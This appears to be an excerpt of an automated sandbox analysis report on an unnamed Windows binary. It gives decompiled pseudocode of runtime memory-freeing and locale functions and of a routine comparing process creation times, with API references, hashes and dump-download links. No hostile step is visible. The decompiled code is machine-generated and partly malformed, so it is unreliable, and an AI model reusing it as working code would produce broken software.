                                                                                                				_v8 = _t28;
                                                                                                				_t70 = _t74 + 0x28;
                                                                                                				do {
                                                                                                					if( *((intOrPtr*)(_t70 - 8)) != 0xfcf198) {
                                                                                                						_t31 =  *_t70;
                                                                                                						if(_t31 != 0 &&  *_t31 == 0) {
                                                                                                							E00FA609F(_t31);
                                                                                                							E00FA609F( *_t55);
                                                                                                						}
                                                                                                						_t28 = _v8;
                                                                                                					}
                                                                                                					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                                                                                						_t29 =  *((intOrPtr*)(_t70 - 4));
                                                                                                						if(_t29 != 0 &&  *_t29 == 0) {
                                                                                                							E00FA609F(_t29);
                                                                                                						}
                                                                                                						_t28 = _v8;
                                                                                                					}
                                                                                                					_t55 = _t55 + 4;
                                                                                                					_t70 = _t70 + 0x10;
                                                                                                					_t28 = _t28 - 1;
                                                                                                					_v8 = _t28;
                                                                                                				} while (_t28 != 0);
                                                                                                				return E00FA609F(_t74);
                                                                                                			}















                                                                                                0x00fabb77
                                                                                                0x00fabb7b
                                                                                                0x00fabb83
                                                                                                0x00fabb8c
                                                                                                0x00fabb91
                                                                                                0x00fabb98
                                                                                                0x00fabba0
                                                                                                0x00fabba8
                                                                                                0x00fabbb3
                                                                                                0x00fabbb9
                                                                                                0x00fabbba
                                                                                                0x00fabbc2
                                                                                                0x00fabbca
                                                                                                0x00fabbd5
                                                                                                0x00fabbdb
                                                                                                0x00fabbdf
                                                                                                0x00fabbea
                                                                                                0x00fabbf0
                                                                                                0x00fabb91
                                                                                                0x00fabbf1
                                                                                                0x00fabbf9
                                                                                                0x00fabc0c
                                                                                                0x00fabc1f
                                                                                                0x00fabc2d
                                                                                                0x00fabc38
                                                                                                0x00fabc3d
                                                                                                0x00fabc46
                                                                                                0x00fabc4e
                                                                                                0x00fabc4f
                                                                                                0x00fabc55
                                                                                                0x00fabc58
                                                                                                0x00fabc5b
                                                                                                0x00fabc62
                                                                                                0x00fabc64
                                                                                                0x00fabc68
                                                                                                0x00fabc70
                                                                                                0x00fabc77
                                                                                                0x00fabc7d
                                                                                                0x00fabc7e
                                                                                                0x00fabc7e
                                                                                                0x00fabc85
                                                                                                0x00fabc87
                                                                                                0x00fabc8c
                                                                                                0x00fabc94
                                                                                                0x00fabc99
                                                                                                0x00fabc9a
                                                                                                0x00fabc9a
                                                                                                0x00fabc9d
                                                                                                0x00fabca0
                                                                                                0x00fabca3
                                                                                                0x00fabca6
                                                                                                0x00fabca6
                                                                                                0x00fabcb8

                                                                                                APIs
                                                                                                • ___free_lconv_mon.LIBCMT ref: 00FABBB3
                                                                                                  • Part of subcall function 00FAADFE: _free.LIBCMT ref: 00FAAE1B
                                                                                                  • Part of subcall function 00FAADFE: _free.LIBCMT ref: 00FAAE2D
                                                                                                  • Part of subcall function 00FAADFE: _free.LIBCMT ref: 00FAAE3F
                                                                                                  • Part of subcall function 00FAADFE: _free.LIBCMT ref: 00FAAE51
                                                                                                  • Part of subcall function 00FAADFE: _free.LIBCMT ref: 00FAAE63
                                                                                                  • Part of subcall function 00FAADFE: _free.LIBCMT ref: 00FAAE75
                                                                                                  • Part of subcall function 00FAADFE: _free.LIBCMT ref: 00FAAE87
                                                                                                  • Part of subcall function 00FAADFE: _free.LIBCMT ref: 00FAAE99
                                                                                                  • Part of subcall function 00FAADFE: _free.LIBCMT ref: 00FAAEAB
                                                                                                  • Part of subcall function 00FAADFE: _free.LIBCMT ref: 00FAAEBD
                                                                                                  • Part of subcall function 00FAADFE: _free.LIBCMT ref: 00FAAECF
                                                                                                  • Part of subcall function 00FAADFE: _free.LIBCMT ref: 00FAAEE1
                                                                                                  • Part of subcall function 00FAADFE: _free.LIBCMT ref: 00FAAEF3
                                                                                                • _free.LIBCMT ref: 00FABBA8
                                                                                                  • Part of subcall function 00FA609F: HeapFree.KERNEL32(00000000,00000000,?,00FAB559,?,00000000,?,?,?,00FAB7FE,?,00000007,?,?,00FABD08,?), ref: 00FA60B5
                                                                                                  • Part of subcall function 00FA609F: GetLastError.KERNEL32(?,?,00FAB559,?,00000000,?,?,?,00FAB7FE,?,00000007,?,?,00FABD08,?,?), ref: 00FA60C7
                                                                                                • _free.LIBCMT ref: 00FABBCA
                                                                                                • _free.LIBCMT ref: 00FABBDF
                                                                                                • _free.LIBCMT ref: 00FABBEA
                                                                                                • _free.LIBCMT ref: 00FABC0C
                                                                                                • _free.LIBCMT ref: 00FABC1F
                                                                                                • _free.LIBCMT ref: 00FABC2D
                                                                                                • _free.LIBCMT ref: 00FABC38
                                                                                                • _free.LIBCMT ref: 00FABC70
                                                                                                • _free.LIBCMT ref: 00FABC77
                                                                                                • _free.LIBCMT ref: 00FABC94
                                                                                                • _free.LIBCMT ref: 00FABCAC
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                • String ID:
                                                                                                • API String ID: 161543041-0
                                                                                                • Opcode ID: 6b806429370ca42be88cbea568bcc36676e5ce1c98fc4ea38fe256bcebb334ca
                                                                                                • Instruction ID: 2a7f1276a0078b46463a781bf9e69120df7c67d436832e6c545a8512734a806f
                                                                                                • Opcode Fuzzy Hash: 6b806429370ca42be88cbea568bcc36676e5ce1c98fc4ea38fe256bcebb334ca
                                                                                                • Instruction Fuzzy Hash: CB313BB2A003059FEB20AA39DC45B5A77EAEB42760F148829F448D7193DF35AD80A720
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 79%
                                                                                                			E00F8BC49(intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				void* _t32;
                                                                                                				intOrPtr _t37;
                                                                                                				intOrPtr _t42;
                                                                                                				intOrPtr _t49;
                                                                                                				intOrPtr _t50;
                                                                                                				signed int _t51;
                                                                                                				signed int _t56;
                                                                                                				void* _t59;
                                                                                                				void* _t67;
                                                                                                				void* _t68;
                                                                                                				void* _t69;
                                                                                                				void* _t70;
                                                                                                				void* _t71;
                                                                                                				void* _t72;
                                                                                                				void* _t76;
                                                                                                
                                                                                                				_t76 = __eflags;
                                                                                                				_t59 = __edx;
                                                                                                				_t50 = __ecx;
                                                                                                				_push(0x64);
                                                                                                				E00FB38E6(0xfb7768, __edi, __esi);
                                                                                                				_t49 = _t50;
                                                                                                				 *((intOrPtr*)(_t69 - 0x6c)) = E00FA1EE6(_t59);
                                                                                                				_t32 = E00F85A28(_t76, _t69 - 0x68);
                                                                                                				_t51 = 0xb;
                                                                                                				_t67 = _t32;
                                                                                                				 *((intOrPtr*)(_t69 - 0x70)) = _t49;
                                                                                                				memcpy(_t69 - 0x3c, _t67, _t51 << 2);
                                                                                                				_t71 = _t70 + 0xc;
                                                                                                				_t63 = _t67 + _t51 + _t51;
                                                                                                				_t68 = 0;
                                                                                                				 *((intOrPtr*)(_t49 + 8)) = 0;
                                                                                                				 *((intOrPtr*)(_t49 + 0x10)) = 0;
                                                                                                				 *((intOrPtr*)(_t49 + 0x14)) = 0;
                                                                                                				 *((intOrPtr*)(_t69 - 4)) = 0;
                                                                                                				E00F85A28(_t76, _t69 - 0x68);
                                                                                                				if( *((char*)(_t69 + 0xc)) == 0) {
                                                                                                					_t13 =  *((intOrPtr*)(_t69 - 0x6c)) + 8; // 0xf883ec45
                                                                                                					_t37 =  *_t13;
                                                                                                				} else {
                                                                                                					_t37 = 0xfc76d9;
                                                                                                				}
                                                                                                				_push(_t69 - 0x68);
                                                                                                				_push(_t68);
                                                                                                				 *((intOrPtr*)(_t49 + 8)) = E00F7F7A0(_t37);
                                                                                                				 *((intOrPtr*)(_t49 + 0x10)) = E00F869EE(_t49, _t63, _t68, "false", _t68, _t69 - 0x3c);
                                                                                                				_t42 = E00F869EE(_t49, _t63, _t68, "true", _t68, _t69 - 0x3c);
                                                                                                				_t72 = _t71 + 0x24;
                                                                                                				 *((intOrPtr*)(_t49 + 0x14)) = _t42;
                                                                                                				if( *((char*)(_t69 + 0xc)) == 0) {
                                                                                                					_t68 = _t69 - 0x3c;
                                                                                                					_t56 = 0xb;
                                                                                                					_push( *((intOrPtr*)(_t69 - 0x6c)));
                                                                                                					memcpy(_t72 - 0x2c, _t68, _t56 << 2);
                                                                                                					_t63 = _t68 + _t56 + _t56;
                                                                                                					_push(0);
                                                                                                					_t44 = E00F8681E(_t49, _t49, _t59, _t68 + _t56 + _t56, _t68, __eflags);
                                                                                                				} else {
                                                                                                					 *((short*)(_t49 + 0xc)) = E00F869BD(0x2e, _t68, _t69 - 0x3c);
                                                                                                					 *((short*)(_t49 + 0xe)) = E00F869BD(0x2c, _t68, _t69 - 0x3c);
                                                                                                				}
                                                                                                				return E00FB38A1(_t44, _t63, _t68);
                                                                                                			}


















                                                                                                0x00f8bc49
                                                                                                0x00f8bc49
                                                                                                0x00f8bc49
                                                                                                0x00f8bc49
                                                                                                0x00f8bc50
                                                                                                0x00f8bc55
                                                                                                0x00f8bc5c
                                                                                                0x00f8bc63
                                                                                                0x00f8bc6a
                                                                                                0x00f8bc6b
                                                                                                0x00f8bc6d
                                                                                                0x00f8bc73
                                                                                                0x00f8bc73
                                                                                                0x00f8bc73
                                                                                                0x00f8bc75
                                                                                                0x00f8bc77
                                                                                                0x00f8bc7a
                                                                                                0x00f8bc7d
                                                                                                0x00f8bc83
                                                                                                0x00f8bc87
                                                                                                0x00f8bc92
                                                                                                0x00f8bc9e
                                                                                                0x00f8bc9e
                                                                                                0x00f8bc94
                                                                                                0x00f8bc94
                                                                                                0x00f8bc94
                                                                                                0x00f8bca4
                                                                                                0x00f8bca5
                                                                                                0x00f8bcac
                                                                                                0x00f8bcbe
                                                                                                0x00f8bccb
                                                                                                0x00f8bcd0
                                                                                                0x00f8bcd3
                                                                                                0x00f8bcda
                                                                                                0x00f8bd04
                                                                                                0x00f8bd09
                                                                                                0x00f8bd0c
                                                                                                0x00f8bd0f
                                                                                                0x00f8bd0f
                                                                                                0x00f8bd11
                                                                                                0x00f8bd15
                                                                                                0x00f8bcdc
                                                                                                0x00f8bce8
                                                                                                0x00f8bcfb
                                                                                                0x00f8bcfb
                                                                                                0x00f8bd1f

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Maklocchr$GetcvtMaklocstr$GetvalsH_prolog3_
                                                                                                • String ID: false$true
                                                                                                • API String ID: 2593140031-2658103896
                                                                                                • Opcode ID: 0a6a4b14856de2cb0fc2074c724afda0595b8ab8898554ab95be862e4bc2e221
                                                                                                • Instruction ID: 31de471d63a20c2c160f8cb36cbcf027ff146145488c51ad033cbd0702d4e9e6
                                                                                                • Opcode Fuzzy Hash: 0a6a4b14856de2cb0fc2074c724afda0595b8ab8898554ab95be862e4bc2e221
                                                                                                • Instruction Fuzzy Hash: 1E212C72D04318AADF14FFA5D886ADF7BA8EF05710F00805AF9099F282DB74D544EBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 93%
                                                                                                			E00F74700(long* __ecx, intOrPtr __edx) {
                                                                                                				struct _FILETIME* _v8;
                                                                                                				char _v16;
                                                                                                				long _v20;
                                                                                                				long* _v24;
                                                                                                				long* _v28;
                                                                                                				long _v32;
                                                                                                				intOrPtr _v36;
                                                                                                				struct _FILETIME* _v40;
                                                                                                				intOrPtr _v44;
                                                                                                				struct _FILETIME* _v48;
                                                                                                				intOrPtr _v52;
                                                                                                				struct _FILETIME _v60;
                                                                                                				struct _FILETIME _v68;
                                                                                                				signed int _t46;
                                                                                                				long* _t49;
                                                                                                				long _t50;
                                                                                                				long* _t76;
                                                                                                				long* _t77;
                                                                                                				void* _t80;
                                                                                                				long _t83;
                                                                                                				void* _t84;
                                                                                                				signed int _t85;
                                                                                                
                                                                                                				_push(0xffffffff);
                                                                                                				_push(0xfb5a20);
                                                                                                				_push( *[fs:0x0]);
                                                                                                				_t46 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_push(_t46 ^ _t85);
                                                                                                				 *[fs:0x0] =  &_v16;
                                                                                                				_v36 = __edx;
                                                                                                				_t49 = __ecx;
                                                                                                				_v24 = __ecx;
                                                                                                				if(__ecx != __edx) {
                                                                                                					_t76 =  &(__ecx[1]);
                                                                                                					_v28 = _t76;
                                                                                                					if(_t76 != __edx) {
                                                                                                						do {
                                                                                                							_t50 =  *_t49;
                                                                                                							_t83 =  *_t76;
                                                                                                							_v32 = _t83;
                                                                                                							_v20 = _t50;
                                                                                                							_t80 = OpenProcess(0x400, 0, _t50);
                                                                                                							_v52 = 0xfc6b50;
                                                                                                							_v48 = _t80;
                                                                                                							_v8 = 0;
                                                                                                							_t84 = OpenProcess(0x400, 0, _t83);
                                                                                                							_v44 = 0xfc6b50;
                                                                                                							_v40 = _t84;
                                                                                                							_v8 = 1;
                                                                                                							if(_t80 == 0xffffffff || _t84 == 0xffffffff) {
                                                                                                								_v8 = 0;
                                                                                                								_v44 = 0xfc6b50;
                                                                                                								__eflags = _t84;
                                                                                                								if(_t84 != 0) {
                                                                                                									CloseHandle(_t84);
                                                                                                									_v40 = 0;
                                                                                                								}
                                                                                                								_v8 = 0xffffffff;
                                                                                                								_v52 = 0xfc6b50;
                                                                                                								__eflags = _t80;
                                                                                                								if(_t80 != 0) {
                                                                                                									CloseHandle(_t80);
                                                                                                									_v48 = 0;
                                                                                                								}
                                                                                                								__eflags = 0;
                                                                                                							} else {
                                                                                                								GetProcessTimes(_t80,  &_v60, 0, 0, 0);
                                                                                                								GetProcessTimes(_t84,  &_v68, 0, 0, 0);
                                                                                                								if(_v60.dwHighDateTime <= _v68.dwHighDateTime) {
                                                                                                									if(__eflags != 0) {
                                                                                                										L13:
                                                                                                										_v8 = 0;
                                                                                                										_v44 = 0xfc6b50;
                                                                                                										__eflags = _t84;
                                                                                                										if(_t84 != 0) {
                                                                                                											CloseHandle(_t84);
                                                                                                											_v40 = 0;
                                                                                                										}
                                                                                                										_v8 = 0xffffffff;
                                                                                                										_v52 = 0xfc6b50;
                                                                                                										__eflags = _t80;
                                                                                                										if(__eflags != 0) {
                                                                                                											CloseHandle(_t80);
                                                                                                											_v48 = 0;
                                                                                                										}
                                                                                                									} else {
                                                                                                										__eflags = _v60.dwLowDateTime - _v68.dwLowDateTime;
                                                                                                										if(__eflags >= 0) {
                                                                                                											goto L6;
                                                                                                										} else {
                                                                                                											goto L13;
                                                                                                										}
                                                                                                									}
                                                                                                								} else {
                                                                                                									L6:
                                                                                                									_v8 = 0;
                                                                                                									_v44 = 0xfc6b50;
                                                                                                									if(_t84 != 0) {
                                                                                                										CloseHandle(_t84);
                                                                                                										_v40 = 0;
                                                                                                									}
                                                                                                									_v8 = 0xffffffff;
                                                                                                									_v52 = 0xfc6b50;
                                                                                                									if(_t80 != 0) {
                                                                                                										CloseHandle(_t80);
                                                                                                										_v48 = 0;
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                							_t77 = _v28;
                                                                                                							_t49 =  ==  ? _v24 : _t77;
                                                                                                							_t76 = _t77 + 4;
                                                                                                							_v24 = _t49;
                                                                                                							_v28 = _t76;
                                                                                                						} while (_t76 != _v36);
                                                                                                					}
                                                                                                				}
                                                                                                				 *[fs:0x0] = _v16;
                                                                                                				return _t49;
                                                                                                			}

























                                                                                                0x00f74703
                                                                                                0x00f74705
                                                                                                0x00f74710
                                                                                                0x00f74717
                                                                                                0x00f7471e
                                                                                                0x00f74722
                                                                                                0x00f7472a
                                                                                                0x00f7472f
                                                                                                0x00f74731
                                                                                                0x00f74736
                                                                                                0x00f7473c
                                                                                                0x00f7473f
                                                                                                0x00f74744
                                                                                                0x00f74750
                                                                                                0x00f74750
                                                                                                0x00f74752
                                                                                                0x00f7475c
                                                                                                0x00f7475f
                                                                                                0x00f74768
                                                                                                0x00f7476a
                                                                                                0x00f74771
                                                                                                0x00f74774
                                                                                                0x00f74789
                                                                                                0x00f7478b
                                                                                                0x00f74792
                                                                                                0x00f74795
                                                                                                0x00f7479c
                                                                                                0x00f74853
                                                                                                0x00f74857
                                                                                                0x00f7485e
                                                                                                0x00f74860
                                                                                                0x00f74863
                                                                                                0x00f74865
                                                                                                0x00f74865
                                                                                                0x00f7486c
                                                                                                0x00f74873
                                                                                                0x00f7487a
                                                                                                0x00f7487c
                                                                                                0x00f7487f
                                                                                                0x00f74881
                                                                                                0x00f74881
                                                                                                0x00f74888
                                                                                                0x00f747ab
                                                                                                0x00f747b6
                                                                                                0x00f747c7
                                                                                                0x00f747d3
                                                                                                0x00f7480f
                                                                                                0x00f74819
                                                                                                0x00f74819
                                                                                                0x00f7481d
                                                                                                0x00f74824
                                                                                                0x00f74826
                                                                                                0x00f74829
                                                                                                0x00f7482b
                                                                                                0x00f7482b
                                                                                                0x00f74832
                                                                                                0x00f74839
                                                                                                0x00f74840
                                                                                                0x00f74842
                                                                                                0x00f74845
                                                                                                0x00f74847
                                                                                                0x00f74847
                                                                                                0x00f74811
                                                                                                0x00f74814
                                                                                                0x00f74817
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f74817
                                                                                                0x00f747d5
                                                                                                0x00f747d5
                                                                                                0x00f747d5
                                                                                                0x00f747d9
                                                                                                0x00f747e2
                                                                                                0x00f747e5
                                                                                                0x00f747e7
                                                                                                0x00f747e7
                                                                                                0x00f747ee
                                                                                                0x00f747f5
                                                                                                0x00f747fe
                                                                                                0x00f74801
                                                                                                0x00f74803
                                                                                                0x00f74803
                                                                                                0x00f7480a
                                                                                                0x00f747d3
                                                                                                0x00f7488a
                                                                                                0x00f74891
                                                                                                0x00f74895
                                                                                                0x00f74898
                                                                                                0x00f7489b
                                                                                                0x00f7489e
                                                                                                0x00f74750
                                                                                                0x00f74744
                                                                                                0x00f748aa
                                                                                                0x00f748b8

                                                                                                APIs
                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,FD8FA683,?,?,00000002), ref: 00F74762
                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,FD8FA683,?,?,00000002), ref: 00F74783
                                                                                                • GetProcessTimes.KERNEL32(00000000,00000002,00000000,00000000,00000000,?,FD8FA683,?,?,00000002), ref: 00F747B6
                                                                                                • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,FD8FA683,?,?,00000002), ref: 00F747C7
                                                                                                • CloseHandle.KERNEL32(00000000,?,FD8FA683,?,?,00000002), ref: 00F747E5
                                                                                                • CloseHandle.KERNEL32(00000000,?,FD8FA683,?,?,00000002), ref: 00F74801
                                                                                                • CloseHandle.KERNEL32(00000000,?,FD8FA683,?,?,00000002), ref: 00F74829
                                                                                                • CloseHandle.KERNEL32(00000000,?,FD8FA683,?,?,00000002), ref: 00F74845
                                                                                                • CloseHandle.KERNEL32(00000000,?,FD8FA683,?,?,00000002), ref: 00F74863
                                                                                                • CloseHandle.KERNEL32(00000000,?,FD8FA683,?,?,00000002), ref: 00F7487F
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$Process$OpenTimes
                                                                                                • String ID:
                                                                                                • API String ID: 1711917922-0
                                                                                                • Opcode ID: 0042635e83c7b7d54ad686e86a37a12ce6794d3c0131c7e3b0b96bb9972c85c1
                                                                                                • Instruction ID: a924bb9503a08870068ae316b694c0c98b20449a584ffd935f96392de892a6af
                                                                                                • Opcode Fuzzy Hash: 0042635e83c7b7d54ad686e86a37a12ce6794d3c0131c7e3b0b96bb9972c85c1
                                                                                                • Instruction Fuzzy Hash: 10518E70D012589FDB10CF98CD85BEEFBB5AB49724F20821AE525B7280C7746D05ABA6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 76%
                                                                                                			E00FA420C(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                                                                                                				signed int _v8;
                                                                                                				short _v270;
                                                                                                				short _v272;
                                                                                                				char _v528;
                                                                                                				char _v700;
                                                                                                				signed int _v704;
                                                                                                				short _v706;
                                                                                                				signed int* _v708;
                                                                                                				signed int _v712;
                                                                                                				signed int _v716;
                                                                                                				signed int _v720;
                                                                                                				signed int* _v724;
                                                                                                				intOrPtr _v728;
                                                                                                				signed int _v732;
                                                                                                				signed int _v736;
                                                                                                				signed int _v740;
                                                                                                				signed int _v744;
                                                                                                				signed int _t146;
                                                                                                				void* _t153;
                                                                                                				signed int _t156;
                                                                                                				signed int _t157;
                                                                                                				intOrPtr _t158;
                                                                                                				signed int _t161;
                                                                                                				signed int _t163;
                                                                                                				signed int _t164;
                                                                                                				intOrPtr _t166;
                                                                                                				signed int _t169;
                                                                                                				signed int _t170;
                                                                                                				signed int _t172;
                                                                                                				signed int _t192;
                                                                                                				signed int _t194;
                                                                                                				signed int _t196;
                                                                                                				signed int _t201;
                                                                                                				signed int _t204;
                                                                                                				signed int _t212;
                                                                                                				intOrPtr* _t213;
                                                                                                				signed int _t222;
                                                                                                				intOrPtr _t225;
                                                                                                				intOrPtr* _t226;
                                                                                                				signed int _t228;
                                                                                                				signed int* _t232;
                                                                                                				signed int _t233;
                                                                                                				intOrPtr _t240;
                                                                                                				signed int _t246;
                                                                                                				signed int _t248;
                                                                                                				signed int _t251;
                                                                                                				signed int* _t252;
                                                                                                				intOrPtr* _t253;
                                                                                                				short _t254;
                                                                                                				signed int _t256;
                                                                                                				signed int _t258;
                                                                                                				void* _t260;
                                                                                                				void* _t262;
                                                                                                
                                                                                                				_t238 = __edx;
                                                                                                				_t256 = _t258;
                                                                                                				_t146 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_v8 = _t146 ^ _t256;
                                                                                                				_push(__ebx);
                                                                                                				_t204 = _a8;
                                                                                                				_push(__esi);
                                                                                                				_push(__edi);
                                                                                                				_t240 = _a4;
                                                                                                				_v736 = _t204;
                                                                                                				_v724 = E00FA5DF2(__ecx, __edx) + 0x278;
                                                                                                				_t153 = E00FA38DF(_t204, __ecx, __edx, _t240, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v712);
                                                                                                				_t260 = _t258 - 0x2e4 + 0x18;
                                                                                                				if(_t153 == 0) {
                                                                                                					L39:
                                                                                                					__eflags = 0;
                                                                                                					goto L40;
                                                                                                				} else {
                                                                                                					_t10 = _t204 + 2; // 0x6
                                                                                                					_t246 = _t10 << 4;
                                                                                                					_t156 =  &_v272;
                                                                                                					_v716 = _t246;
                                                                                                					_t238 =  *(_t246 + _t240);
                                                                                                					_t212 =  *(_t246 + _t240);
                                                                                                					while(1) {
                                                                                                						_v704 = _v704 & 0x00000000;
                                                                                                						_t248 = _v716;
                                                                                                						if( *_t156 !=  *_t212) {
                                                                                                							break;
                                                                                                						}
                                                                                                						if( *_t156 == 0) {
                                                                                                							L6:
                                                                                                							_t157 = _v704;
                                                                                                						} else {
                                                                                                							_t254 =  *((intOrPtr*)(_t156 + 2));
                                                                                                							_v706 = _t254;
                                                                                                							_t248 = _v716;
                                                                                                							if(_t254 !=  *((intOrPtr*)(_t212 + 2))) {
                                                                                                								break;
                                                                                                							} else {
                                                                                                								_t156 = _t156 + 4;
                                                                                                								_t212 = _t212 + 4;
                                                                                                								if(_v706 != 0) {
                                                                                                									continue;
                                                                                                								} else {
                                                                                                									goto L6;
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						L8:
                                                                                                						if(_t157 != 0) {
                                                                                                							_t213 =  &_v272;
                                                                                                							_t238 = _t213 + 2;
                                                                                                							do {
                                                                                                								_t158 =  *_t213;
                                                                                                								_t213 = _t213 + 2;
                                                                                                								__eflags = _t158 - _v704;
                                                                                                							} while (_t158 != _v704);
                                                                                                							_v720 = (_t213 - _t238 >> 1) + 1;
                                                                                                							_t161 = E00FA60D9(4 + ((_t213 - _t238 >> 1) + 1) * 2);
                                                                                                							_v732 = _t161;
                                                                                                							__eflags = _t161;
                                                                                                							if(_t161 == 0) {
                                                                                                								goto L39;
                                                                                                							} else {
                                                                                                								_v728 =  *((intOrPtr*)(_t248 + _t240));
                                                                                                								_v740 =  *(_t240 + 0xa0 + _t204 * 4);
                                                                                                								_v744 =  *(_t240 + 8);
                                                                                                								_v708 = _t161 + 4;
                                                                                                								_t163 = E00FA59A2(_t161 + 4, _v720,  &_v272);
                                                                                                								_t262 = _t260 + 0xc;
                                                                                                								__eflags = _t163;
                                                                                                								if(_t163 != 0) {
                                                                                                									_t164 = _v704;
                                                                                                									_push(_t164);
                                                                                                									_push(_t164);
                                                                                                									_push(_t164);
                                                                                                									_push(_t164);
                                                                                                									_push(_t164);
                                                                                                									E00F98DB9();
                                                                                                									asm("int3");
                                                                                                									_t166 =  *0xfd0f54; // 0x0
                                                                                                									return _t166;
                                                                                                								} else {
                                                                                                									__eflags = _v272 - 0x43;
                                                                                                									 *((intOrPtr*)(_t248 + _t240)) = _v708;
                                                                                                									if(_v272 != 0x43) {
                                                                                                										L17:
                                                                                                										_t169 = E00FA35EC(_t204, _t240,  &_v700);
                                                                                                										_t222 = _v704;
                                                                                                									} else {
                                                                                                										__eflags = _v270;
                                                                                                										if(_v270 != 0) {
                                                                                                											goto L17;
                                                                                                										} else {
                                                                                                											_t222 = _v704;
                                                                                                											_t169 = _t222;
                                                                                                										}
                                                                                                									}
                                                                                                									 *(_t240 + 0xa0 + _t204 * 4) = _t169;
                                                                                                									__eflags = _t204 - 2;
                                                                                                									if(_t204 != 2) {
                                                                                                										__eflags = _t204 - 1;
                                                                                                										if(_t204 != 1) {
                                                                                                											__eflags = _t204 - 5;
                                                                                                											if(_t204 == 5) {
                                                                                                												 *((intOrPtr*)(_t240 + 0x14)) = _v712;
                                                                                                											}
                                                                                                										} else {
                                                                                                											 *((intOrPtr*)(_t240 + 0x10)) = _v712;
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t252 = _v724;
                                                                                                										_t238 = _t222;
                                                                                                										_t232 = _t252;
                                                                                                										 *(_t240 + 8) = _v712;
                                                                                                										_v708 = _t252;
                                                                                                										_v720 = _t252[8];
                                                                                                										_v712 = _t252[9];
                                                                                                										while(1) {
                                                                                                											__eflags =  *(_t240 + 8) -  *_t232;
                                                                                                											if( *(_t240 + 8) ==  *_t232) {
                                                                                                												break;
                                                                                                											}
                                                                                                											_t253 = _v708;
                                                                                                											_t238 = _t238 + 1;
                                                                                                											_t201 =  *_t232;
                                                                                                											 *_t253 = _v720;
                                                                                                											_v712 = _t232[1];
                                                                                                											_t232 = _t253 + 8;
                                                                                                											 *((intOrPtr*)(_t253 + 4)) = _v712;
                                                                                                											_t204 = _v736;
                                                                                                											_t252 = _v724;
                                                                                                											_v720 = _t201;
                                                                                                											_v708 = _t232;
                                                                                                											__eflags = _t238 - 5;
                                                                                                											if(_t238 < 5) {
                                                                                                												continue;
                                                                                                											} else {
                                                                                                											}
                                                                                                											L25:
                                                                                                											__eflags = _t238 - 5;
                                                                                                											if(__eflags == 0) {
                                                                                                												_t192 = E00FAB9ED(_t204, _t238, _t240, _t252, __eflags, _v704, 1, 0xfbc690, 0x7f,  &_v528,  *(_t240 + 8), 1);
                                                                                                												_t262 = _t262 + 0x1c;
                                                                                                												__eflags = _t192;
                                                                                                												if(_t192 == 0) {
                                                                                                													_t233 = _v704;
                                                                                                												} else {
                                                                                                													_t194 = _v704;
                                                                                                													do {
                                                                                                														 *(_t256 + _t194 * 2 - 0x20c) =  *(_t256 + _t194 * 2 - 0x20c) & 0x000001ff;
                                                                                                														_t194 = _t194 + 1;
                                                                                                														__eflags = _t194 - 0x7f;
                                                                                                													} while (_t194 < 0x7f);
                                                                                                													_t196 = E00F967B4( &_v528,  *0xfcf0bc, 0xfe);
                                                                                                													_t262 = _t262 + 0xc;
                                                                                                													__eflags = _t196;
                                                                                                													_t233 = 0 | _t196 == 0x00000000;
                                                                                                												}
                                                                                                												_t252[1] = _t233;
                                                                                                												 *_t252 =  *(_t240 + 8);
                                                                                                											}
                                                                                                											 *(_t240 + 0x18) = _t252[1];
                                                                                                											goto L37;
                                                                                                										}
                                                                                                										__eflags = _t238;
                                                                                                										if(_t238 != 0) {
                                                                                                											 *_t252 =  *(_t252 + _t238 * 8);
